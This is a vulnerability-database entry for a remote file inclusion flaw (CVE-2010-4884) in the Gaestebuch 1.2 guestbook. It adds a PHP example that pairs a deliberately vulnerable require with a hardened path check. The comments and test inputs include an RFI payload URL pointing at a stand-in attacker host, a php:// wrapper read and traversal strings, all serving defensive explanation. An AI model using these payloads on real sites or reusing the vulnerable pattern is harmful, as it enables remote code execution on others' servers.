CVE-2010-4884

Gaestebuch 1.2 - Remote Code Execution via script_pfad Parameter


Exploitation Summary

EIP tracks one public exploit for CVE-2010-4884, a PoC published by bd0rk.

AI-analyzed exploit summary: The exploit demonstrates a Remote File Inclusion (RFI) vulnerability in HINNENDAHL.COM Gaestebuch 1.2. The script_pfad request parameter (used as $script_pfad inside /guestbook/gbook.php) is passed unsanitized into a require statement, so a URL pointing at an attacker-hosted file is fetched and executed as PHP.

Description

PHP remote file inclusion vulnerability in guestbook/gbook.php in Gaestebuch 1.2 allows remote attackers to execute arbitrary PHP code via a URL in the script_pfad parameter.
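The following PHP is an added example, not code from Gaestebuch 1.2 or from the exploit author. It models the pattern both the summary and the CVE description point at (a request parameter named script_pfad used as the prefix of a require) next to a hardened replacement that pins the include to a fixed directory and refuses stream wrappers, NUL bytes and traversal. All function names, the include filename gbook_config.php and the demo inputs are hypothetical.

```php
<?php
declare(strict_types=1);

/*
 * Added example (not the project's code). Shows the RFI pattern described
 * for CVE-2010-4884 and a hardened replacement. Names are hypothetical.
 */

// Vulnerable shape. Under register_globals=On (PHP < 5.4) a request
// ?script_pfad=... silently becomes $script_pfad; the bug is the same if the
// value is read from $_GET. With allow_url_include=On (or allow_url_fopen=On
// on PHP < 5.2) a request such as
//   gbook.php?script_pfad=http://attacker.example/shell.txt?
// makes PHP download the remote file and execute it.
function vulnerable_require(string $script_pfad): void
{
    require $script_pfad . '/gbook_config.php';   // hypothetical include
}

// Hardened replacement: the parameter may only pick a directory below a
// fixed base. Wrappers, NUL bytes and escapes from the base are rejected.
function safe_script_path(string $base, string $candidate): ?string
{
    // A "scheme:" prefix (http://, ftp://, php://, data:, expect://) selects
    // a stream wrapper, never a directory. NUL bytes truncate C paths.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate) === 1
        || strpos($candidate, "\0") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $candidate);
    if ($baseReal === false || $target === false) {
        return null;                 // base missing or candidate does not exist
    }
    // realpath() resolved ".." and symlinks; now enforce containment.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if ($target !== $baseReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                 // resolved outside the base directory
    }
    return $target;
}

function hardened_require(string $base, string $script_pfad): void
{
    $dir = safe_script_path($base, $script_pfad);
    if ($dir === null) {
        http_response_code(400);
        exit('invalid script_pfad');
    }
    require $dir . '/gbook_config.php';
}

// Self-contained demonstration on a constructed directory layout.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gbook_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'templates', 0700, true);

$inputs = [                                        // constructed test inputs
    'templates',                                   // legitimate
    'templates/../templates',                      // normalises back inside base
    '../../../../etc',                             // traversal out of base
    'http://attacker.example/shell.txt?',          // RFI payload shape
    'php://filter/convert.base64-encode/resource', // wrapper-based read
    "templates\0ignored",                          // NUL-byte truncation trick
];
foreach ($inputs as $in) {
    $ok = safe_script_path($base, $in);
    printf("%-48s => %s\n", addcslashes($in, "\0"),
        $ok === null ? 'REJECTED' : 'allowed: ' . $ok);
}

rmdir($base . DIRECTORY_SEPARATOR . 'templates');
rmdir($base);
```

Run it with `php example.php`; only the first two inputs are allowed, and both resolve to the same templates directory. The wrapper check comes before realpath() deliberately: realpath() does not understand URLs, and on PHP 8 it throws on NUL bytes, so filtering those first keeps the failure mode a clean reject. In production the parameter should ideally not select a directory at all; if it must, an explicit allowlist of names is simpler than path containment, and setting allow_url_include=Off (the default since PHP 5.2) removes the remote half of the bug even where the code is unfixed.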

Exploits (1)

exploitdb (working PoC, verified)
by bd0rk · text · webapps · php
https://www.exploit-db.com/exploits/14810

Classification
Working PoC: 90%
Attack type: RCE
Complexity: trivial
Reliability: reliable
Target: HINNENDAHL.COM Gaestebuch 1.2
Authentication: none required
Prerequisites: network access to the vulnerable gbook.php script · an attacker-controlled web server hosting the PHP payload, reachable from the target · PHP on the target configured to allow URL includes (allow_url_include=On, or allow_url_fopen=On on PHP < 5.2)
devstral-2 · analyzed Feb 16, 2026

References (3)

Exploit (x_refsource_exploit-db)
http://www.exploit-db.com/exploits/14810
Third Party Advisory (x_refsource_sreason)
http://securityreason.com/securityalert/8436

Scores

EPSS 0.0599 (5.99% estimated probability of exploitation activity in the next 30 days)
EPSS percentile 92.4%

Details

CWE
CWE-94 (Improper Control of Generation of Code, 'Code Injection')
Status published
Products (1)
hinnendahl/gaestebuch 1.2
Published Oct 07, 2011
Tracked Since Feb 18, 2026